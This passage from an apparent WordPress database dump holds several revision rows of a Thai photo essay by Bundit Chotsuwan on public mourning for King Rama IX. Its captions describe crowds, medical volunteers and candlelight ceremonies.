style=\"text-align: center;\">หนึ่งในกลุ่มชาติพันธุ์ที่มาแสดงความอาลัยและประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามประเพณีของแต่ละกลุ่ม คือ “ชาวอาข่า” ในภาพหญิงชาวอาข่า 5 คน กําลังประกอบพิธีกรรมและท่อง “บทสวด” ที่ใช้ในพิธีศพตามวัฒนธรรมอาข่า</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ผู้ปิดทองหลังพระ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4440\" src=\"/wp-content/uploads/2018/11/9-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บุคลากรในหน่วยปฐมพยาบาลในสถานที่ต่างๆ ที่มีการรวมตัวกันของพสกนิกรชาวไทย เพื่อทํากิจกรรมถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 นั้น คือ “ผู้ปิดทองหลังพระ”อย่างแท้จริง เพราะด้วยสภาพอากาศที่อบอ้าวและความเนืองแน่นของประชาชนที่มารวมตัวกันส่งผลให้ผู้คนเจ็บป่วยเป็นจํานวนมาก ในภาพนี้พยาบาลและอาสาสมัคร กําลังให้การช่วยเหลือแก่หญิง 2 คนที่เป็นลมขณะรอคิวเข้ากราบสักการะพระบรมศพ ณ บริเวณเต็นท์ปฐมพยาบาลด้านข้างสนามหลวงภายใต้แดดที่ร้อนจัดและอากาศที่อบอ้าว</p>\r\n<img class=\"aligncenter size-large wp-image-4441\" src=\"/wp-content/uploads/2018/11/26-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนจากทั่วสารทิศมารวมตัวกันแต่เช้าตรู่ เพื่อเตรียมร้องเพลงสรรเสริญพระบารมีครั้งประวัติศาสตร์ร่วมกันเสียงเพลงในคํ่าคืนนั้นดังกึกก้องไปทั่วท้องสนามหลวงและตราตรึงในหัวใจชาวไทยตลอดไป</p>\r\n<img class=\"aligncenter size-large wp-image-4442\" src=\"/wp-content/uploads/2018/11/28-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เหล่าพยาบาลรวมตัวกันถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ กระทรวงสาธารณสุข</p>\r\n<img class=\"aligncenter size-large wp-image-4443\" src=\"/wp-content/uploads/2018/11/29-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พยาบาลท่านหนึ่งกําลังปฏิบัติหน้าที่ดูแลและให้ความช่วยเหลือผู้คนอย่างใกล้ชิดท่ามกลางศิษย์เก่าและศิษย์ปัจจุบันของมหาวิทยาลัยธรรมศาสตร์ที่มารวมตัวแสดงความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการแปรอักษร ณ สนามฟุตบอลมหาวิทยาลัยธรรมศาสตร์ วิทยาเขตท่าพระจันทร์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในหลวงของแผ่นดิน”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4444\" src=\"/wp-content/uploads/2018/11/30-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เด็กน้อยชูพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในขณะรอรับขบวนอัญเชิญพระบรมศพ ที่เคลื่อนจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวัง สู่พระที่นั่งดุสิตมหาปราสาท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"รวมใจถวายความอาลัย\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4445\" src=\"/wp-content/uploads/2018/11/34-Bundit-Chotsuwan-copy-1024x668.jpg\" alt=\"\" width=\"640\" height=\"418\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4446\" src=\"/wp-content/uploads/2018/11/41-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แด่พระองค์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4447\" src=\"/wp-content/uploads/2018/11/44-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">วีรชัย บาลไธสง ศิลปินอิสระ ตั้งใจว่าจะวาดว่าพระบรมสาทิสลักษณ์มาถวายให้ในหลวงรัชกาลที่ 9 ในวันที่ 5 ธันวาคม พ.ศ. 2559 แต่ยังไม่ทันถึงวันนั้น ข่าวการเสด็จสวรรคตของในหลวง ในวันที่ 13 ตุลาคม พ.ศ. 2559 ทําให้เขามายืนเฝ้ารับขบวนอัญเชิญพระบรมศพที่หน้าโรงพยาบาลศิริราช พร้อมกับชู “ภาพที่วาดไม่เสร็จ” นั้นด้วยความอาลัยยิ่ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"พยาบาลของพ่อ ณ ศิริราช\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4448\" src=\"/wp-content/uploads/2018/11/45-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภาพประทับใจจากงานนิทรรศการ “น้อมรําลึกในหลวงรัชกาลที่ ๙”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4449\" src=\"/wp-content/uploads/2018/11/50-Bundit-Chotsuwan-copy-1024x646.jpg\" alt=\"\" width=\"640\" height=\"404\" />\r\n<p style=\"text-align: center;\">ณ หอศิลปวัฒนธรรมแห่งกรุงเทพมหานคร โดยสมาคมถ่ายภาพแห่งประเทศไทยในพระบรมราชูปถัมภ์ ภายในงานจัดแสดงภาพถ่าย 89 ภาพ จากช่างภาพ 89 คน ที่พร้อมใจถ่ายทอดความรู้สึกและความทรงจําที่มีต่อในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รวมใจเป็นหนึ่งเดียว”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4450\" src=\"/wp-content/uploads/2018/11/53-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แม้แดดยามบ่ายจะร้อน แต่ผู้คนก็ยิ่งหลั่งไหลเข้ามาในบริเวณรอบกําแพงพระบรมมหาราชวัง และในท้องสนามหลวง เพื่อร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนแสดงความอาลัย</p>\r\n ', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'inherit', 'closed', 'closed', '', '4426-revision-v1', '', '', '2018-11-13 13:51:28', '2018-11-13 06:51:28', '', 4426, 'http://www.technicrayong.ac.th/4426-revision-v1/', 0, 'revision', '', 0),
(4469, 3, '2018-11-13 13:56:07', '2018-11-13 06:56:07', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n<p style=\"text-align: center;\"><img class=\"aligncenter size-large wp-image-4437\" src=\"/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy-1024x643.jpg\" alt=\"\" width=\"640\" height=\"402\" />พสกนิกรมารอรับขบวนอัญเชิญพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวังท่ามกลางความโศกเศร้าเงียบงันตลอดระยะทาง</p>\r\n<img class=\"aligncenter size-large wp-image-4438\" src=\"/wp-content/uploads/2018/11/6-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และอาสาสมัครต้องรับมือกับอาการหน้ามืดเป็นลม เนื่องจากอากาศที่ร้อนอบอ้าวและประชาชนจํานวนมาก</p>\r\n<img class=\"aligncenter size-large wp-image-4439\" src=\"/wp-content/uploads/2018/11/7-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หนึ่งในกลุ่มชาติพันธุ์ที่มาแสดงความอาลัยและประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามประเพณีของแต่ละกลุ่ม คือ “ชาวอาข่า” ในภาพหญิงชาวอาข่า 5 คน กําลังประกอบพิธีกรรมและท่อง “บทสวด” ที่ใช้ในพิธีศพตามวัฒนธรรมอาข่า</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ผู้ปิดทองหลังพระ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4440\" src=\"/wp-content/uploads/2018/11/9-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บุคลากรในหน่วยปฐมพยาบาลในสถานที่ต่างๆ ที่มีการรวมตัวกันของพสกนิกรชาวไทย เพื่อทํากิจกรรมถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 นั้น คือ “ผู้ปิดทองหลังพระ”อย่างแท้จริง เพราะด้วยสภาพอากาศที่อบอ้าวและความเนืองแน่นของประชาชนที่มารวมตัวกันส่งผลให้ผู้คนเจ็บป่วยเป็นจํานวนมาก ในภาพนี้พยาบาลและอาสาสมัคร กําลังให้การช่วยเหลือแก่หญิง 2 คนที่เป็นลมขณะรอคิวเข้ากราบสักการะพระบรมศพ ณ บริเวณเต็นท์ปฐมพยาบาลด้านข้างสนามหลวงภายใต้แดดที่ร้อนจัดและอากาศที่อบอ้าว</p>\r\n<img class=\"aligncenter size-large wp-image-4441\" src=\"/wp-content/uploads/2018/11/26-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนจากทั่วสารทิศมารวมตัวกันแต่เช้าตรู่ เพื่อเตรียมร้องเพลงสรรเสริญพระบารมีครั้งประวัติศาสตร์ร่วมกันเสียงเพลงในคํ่าคืนนั้นดังกึกก้องไปทั่วท้องสนามหลวงและตราตรึงในหัวใจชาวไทยตลอดไป</p>\r\n<img class=\"aligncenter size-large wp-image-4442\" src=\"/wp-content/uploads/2018/11/28-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เหล่าพยาบาลรวมตัวกันถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ กระทรวงสาธารณสุข</p>\r\n<img class=\"aligncenter size-large wp-image-4443\" src=\"/wp-content/uploads/2018/11/29-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พยาบาลท่านหนึ่งกําลังปฏิบัติหน้าที่ดูแลและให้ความช่วยเหลือผู้คนอย่างใกล้ชิดท่ามกลางศิษย์เก่าและศิษย์ปัจจุบันของมหาวิทยาลัยธรรมศาสตร์ที่มารวมตัวแสดงความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการแปรอักษร ณ สนามฟุตบอลมหาวิทยาลัยธรรมศาสตร์ วิทยาเขตท่าพระจันทร์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในหลวงของแผ่นดิน”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4444\" src=\"/wp-content/uploads/2018/11/30-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เด็กน้อยชูพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในขณะรอรับขบวนอัญเชิญพระบรมศพ ที่เคลื่อนจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวัง สู่พระที่นั่งดุสิตมหาปราสาท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"รวมใจถวายความอาลัย\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4445\" src=\"/wp-content/uploads/2018/11/34-Bundit-Chotsuwan-copy-1024x668.jpg\" alt=\"\" width=\"640\" height=\"418\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4446\" src=\"/wp-content/uploads/2018/11/41-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แด่พระองค์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4447\" src=\"/wp-content/uploads/2018/11/44-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">วีรชัย บาลไธสง ศิลปินอิสระ ตั้งใจว่าจะวาดว่าพระบรมสาทิสลักษณ์มาถวายให้ในหลวงรัชกาลที่ 9 ในวันที่ 5 ธันวาคม พ.ศ. 2559 แต่ยังไม่ทันถึงวันนั้น ข่าวการเสด็จสวรรคตของในหลวง ในวันที่ 13 ตุลาคม พ.ศ. 2559 ทําให้เขามายืนเฝ้ารับขบวนอัญเชิญพระบรมศพที่หน้าโรงพยาบาลศิริราช พร้อมกับชู “ภาพที่วาดไม่เสร็จ” นั้นด้วยความอาลัยยิ่ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"พยาบาลของพ่อ ณ ศิริราช\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4448\" src=\"/wp-content/uploads/2018/11/45-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภาพประทับใจจากงานนิทรรศการ “น้อมรําลึกในหลวงรัชกาลที่ ๙”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4449\" src=\"/wp-content/uploads/2018/11/50-Bundit-Chotsuwan-copy-1024x646.jpg\" alt=\"\" width=\"640\" height=\"404\" />\r\n<p style=\"text-align: center;\">ณ หอศิลปวัฒนธรรมแห่งกรุงเทพมหานคร โดยสมาคมถ่ายภาพแห่งประเทศไทยในพระบรมราชูปถัมภ์ ภายในงานจัดแสดงภาพถ่าย 89 ภาพ จากช่างภาพ 89 คน ที่พร้อมใจถ่ายทอดความรู้สึกและความทรงจําที่มีต่อในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รวมใจเป็นหนึ่งเดียว”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4450\" src=\"/wp-content/uploads/2018/11/53-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แม้แดดยามบ่ายจะร้อน แต่ผู้คนก็ยิ่งหลั่งไหลเข้ามาในบริเวณรอบกําแพงพระบรมมหาราชวัง และในท้องสนามหลวง เพื่อร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนแสดงความอาลัย</p>\r\n<img class=\"aligncenter size-large wp-image-4451\" src=\"/wp-content/uploads/2018/11/56-Bundit-Chotsuwan-copy-1024x684.jpg\" alt=\"\" width=\"640\" height=\"428\" />\r\n<p style=\"text-align: center;\">ในคํ่าคืนที่เงียบงันและแสนเศร้าของชาวไทย พสกนิกรต่างนําดอกไม้มากราบแสดงความอาลัยต่อการจากไปของในหลวงผู้เป็นที่รักยิ่ง\r\nตลอดแนวกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4452\" src=\"/wp-content/uploads/2018/11/60-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ณ เวลา 0 .09 น. ของคืนส่งท้ายปี เก่าต้อนรับปี ใหม่ วันที่ 1 มกราคม พ.ศ. 25 60 บริเวณท้องสนามหลวงสว่างไสวไปด้วยแสงเทียน และกึกก้องไปด้วยเสียงสวดมนต์และเสียงเพลงสรรเสริญพระบารมีของประชาชนที่มาร่วมงาน “แสงเทียนแห่งสยาม” ซึ่งรัฐบาลจัดขึ้นเพื่อถวายเป็นพระราชกุศล แด่ในหลวงรัชกาลที่ 9 และพระบรมวงศานุวงศ์ทุกพระองค์ รวมทั้งเพื่อเสริมความเป็นสิริมงคลแก่ประชาชนชาวไทย ให้มีความสุขตลอดปี</p>\r\n ', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'inherit', 'closed', 'closed', '', '4426-revision-v1', '', '', '2018-11-13 13:56:07', '2018-11-13 06:56:07', '', 4426, 'http://www.technicrayong.ac.th/4426-revision-v1/', 0, 'revision', '', 0),
(4470, 3, '2018-11-13 14:07:10', '2018-11-13 07:07:10', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n<p style=\"text-align: center;\"><img class=\"aligncenter size-large wp-image-4437\" src=\"/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy-1024x643.jpg\" alt=\"\" width=\"640\" height=\"402\" />พสกนิกรมารอรับขบวนอัญเชิญพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวังท่ามกลางความโศกเศร้าเงียบงันตลอดระยะทาง</p>\r\n<img class=\"aligncenter size-large wp-image-4438\" src=\"/wp-content/uploads/2018/11/6-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และอาสาสมัครต้องรับมือกับอาการหน้ามืดเป็นลม เนื่องจากอากาศที่ร้อนอบอ้าวและประชาชนจํานวนมาก</p>\r\n<img class=\"aligncenter size-large wp-image-4439\" src=\"/wp-content/uploads/2018/11/7-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หนึ่งในกลุ่มชาติพันธุ์ที่มาแสดงความอาลัยและประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามประเพณีของแต่ละกลุ่ม คือ “ชาวอาข่า” ในภาพหญิงชาวอาข่า 5 คน กําลังประกอบพิธีกรรมและท่อง “บทสวด” ที่ใช้ในพิธีศพตามวัฒนธรรมอาข่า</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ผู้ปิดทองหลังพระ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4440\" src=\"/wp-content/uploads/2018/11/9-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บุคลากรในหน่วยปฐมพยาบาลในสถานที่ต่างๆ ที่มีการรวมตัวกันของพสกนิกรชาวไทย เพื่อทํากิจกรรมถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 นั้น คือ “ผู้ปิดทองหลังพระ”อย่างแท้จริง เพราะด้วยสภาพอากาศที่อบอ้าวและความเนืองแน่นของประชาชนที่มารวมตัวกันส่งผลให้ผู้คนเจ็บป่วยเป็นจํานวนมาก ในภาพนี้พยาบาลและอาสาสมัคร กําลังให้การช่วยเหลือแก่หญิง 2 คนที่เป็นลมขณะรอคิวเข้ากราบสักการะพระบรมศพ ณ บริเวณเต็นท์ปฐมพยาบาลด้านข้างสนามหลวงภายใต้แดดที่ร้อนจัดและอากาศที่อบอ้าว</p>\r\n<img class=\"aligncenter size-large wp-image-4441\" src=\"/wp-content/uploads/2018/11/26-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนจากทั่วสารทิศมารวมตัวกันแต่เช้าตรู่ เพื่อเตรียมร้องเพลงสรรเสริญพระบารมีครั้งประวัติศาสตร์ร่วมกันเสียงเพลงในคํ่าคืนนั้นดังกึกก้องไปทั่วท้องสนามหลวงและตราตรึงในหัวใจชาวไทยตลอดไป</p>\r\n<img class=\"aligncenter size-large wp-image-4442\" src=\"/wp-content/uploads/2018/11/28-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เหล่าพยาบาลรวมตัวกันถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ กระทรวงสาธารณสุข</p>\r\n<img class=\"aligncenter size-large wp-image-4443\" src=\"/wp-content/uploads/2018/11/29-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พยาบาลท่านหนึ่งกําลังปฏิบัติหน้าที่ดูแลและให้ความช่วยเหลือผู้คนอย่างใกล้ชิดท่ามกลางศิษย์เก่าและศิษย์ปัจจุบันของมหาวิทยาลัยธรรมศาสตร์ที่มารวมตัวแสดงความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการแปรอักษร ณ สนามฟุตบอลมหาวิทยาลัยธรรมศาสตร์ วิทยาเขตท่าพระจันทร์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในหลวงของแผ่นดิน”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4444\" src=\"/wp-content/uploads/2018/11/30-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เด็กน้อยชูพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในขณะรอรับขบวนอัญเชิญพระบรมศพ ที่เคลื่อนจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวัง สู่พระที่นั่งดุสิตมหาปราสาท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"รวมใจถวายความอาลัย\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4445\" src=\"/wp-content/uploads/2018/11/34-Bundit-Chotsuwan-copy-1024x668.jpg\" alt=\"\" width=\"640\" height=\"418\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4446\" src=\"/wp-content/uploads/2018/11/41-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แด่พระองค์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4447\" src=\"/wp-content/uploads/2018/11/44-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">วีรชัย บาลไธสง ศิลปินอิสระ ตั้งใจว่าจะวาดว่าพระบรมสาทิสลักษณ์มาถวายให้ในหลวงรัชกาลที่ 9 ในวันที่ 5 ธันวาคม พ.ศ. 2559 แต่ยังไม่ทันถึงวันนั้น ข่าวการเสด็จสวรรคตของในหลวง ในวันที่ 13 ตุลาคม พ.ศ. 2559 ทําให้เขามายืนเฝ้ารับขบวนอัญเชิญพระบรมศพที่หน้าโรงพยาบาลศิริราช พร้อมกับชู “ภาพที่วาดไม่เสร็จ” นั้นด้วยความอาลัยยิ่ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"พยาบาลของพ่อ ณ ศิริราช\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4448\" src=\"/wp-content/uploads/2018/11/45-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภาพประทับใจจากงานนิทรรศการ “น้อมรําลึกในหลวงรัชกาลที่ ๙”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4449\" src=\"/wp-content/uploads/2018/11/50-Bundit-Chotsuwan-copy-1024x646.jpg\" alt=\"\" width=\"640\" height=\"404\" />\r\n<p style=\"text-align: center;\">ณ หอศิลปวัฒนธรรมแห่งกรุงเทพมหานคร โดยสมาคมถ่ายภาพแห่งประเทศไทยในพระบรมราชูปถัมภ์ ภายในงานจัดแสดงภาพถ่าย 89 ภาพ จากช่างภาพ 89 คน ที่พร้อมใจถ่ายทอดความรู้สึกและความทรงจําที่มีต่อในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รวมใจเป็นหนึ่งเดียว”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4450\" src=\"/wp-content/uploads/2018/11/53-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แม้แดดยามบ่ายจะร้อน แต่ผู้คนก็ยิ่งหลั่งไหลเข้ามาในบริเวณรอบกําแพงพระบรมมหาราชวัง และในท้องสนามหลวง เพื่อร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนแสดงความอาลัย</p>\r\n<img class=\"aligncenter size-large wp-image-4451\" src=\"/wp-content/uploads/2018/11/56-Bundit-Chotsuwan-copy-1024x684.jpg\" alt=\"\" width=\"640\" height=\"428\" />\r\n<p style=\"text-align: center;\">ในคํ่าคืนที่เงียบงันและแสนเศร้าของชาวไทย พสกนิกรต่างนําดอกไม้มากราบแสดงความอาลัยต่อการจากไปของในหลวงผู้เป็นที่รักยิ่ง\r\nตลอดแนวกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4452\" src=\"/wp-content/uploads/2018/11/60-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ณ เวลา 0 .09 น. ของคืนส่งท้ายปี เก่าต้อนรับปี ใหม่ วันที่ 1 มกราคม พ.ศ. 25 60 บริเวณท้องสนามหลวงสว่างไสวไปด้วยแสงเทียน และกึกก้องไปด้วยเสียงสวดมนต์และเสียงเพลงสรรเสริญพระบารมีของประชาชนที่มาร่วมงาน “แสงเทียนแห่งสยาม” ซึ่งรัฐบาลจัดขึ้นเพื่อถวายเป็นพระราชกุศล แด่ในหลวงรัชกาลที่ 9 และพระบรมวงศานุวงศ์ทุกพระองค์ รวมทั้งเพื่อเสริมความเป็นสิริมงคลแก่ประชาชนชาวไทย ให้มีความสุขตลอดปี</p>\r\n<img class=\"aligncenter size-large wp-image-4453\" src=\"/wp-content/uploads/2018/11/63-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนจากทั่วสารทิศมารวมตัวกันแต่เช้าตรู่ เพื่อเตรียมร้องเพลงสรรเสริญพระบารมีครั้งประวัติศาสตร์ร่วมกัน เสียงเพลงในคํ่าคืนนั้นดังกึกก้องไปทั่วท้องสนามหลวงและตราตรึงในหัวใจชาวไทยตลอดไป</p>\r\n<img class=\"aligncenter size-large wp-image-4454\" src=\"/wp-content/uploads/2018/11/66-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4455\" src=\"/wp-content/uploads/2018/11/67-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พยาบาล แพทย์ และประชาชนที่มาร่วมงาน “จุฬาฯ เทิด ธ พระภูมิพล”ณ บริเวณลานพระบรมราชานุสาวรีย์ รัชกาลที่ 6 กําลังยืนสงบนิ่งต่อหน้าพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 เพื่อแสดงความอาลัย และรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4456\" src=\"/wp-content/uploads/2018/11/68-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บรรยากาศโดยรอบกําแพงพระบรมมหาราชวัง ประชาชนเดินทางมาแสดงอาลัยด้วยรําลึกในพระมหากรุณาธิคุณอย่างที่สุดมิได้ของพระบาทสมเด็จพระเจ้าอยู่หัวพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n<img class=\"aligncenter size-large wp-image-4457\" src=\"/wp-content/uploads/2018/11/71-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4458\" src=\"/wp-content/uploads/2018/11/75-Bundit-Chotsuwan-copy-1024x658.jpg\" alt=\"\" width=\"640\" height=\"411\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และบุคลากรจากคณะแพทยศาสตร์ 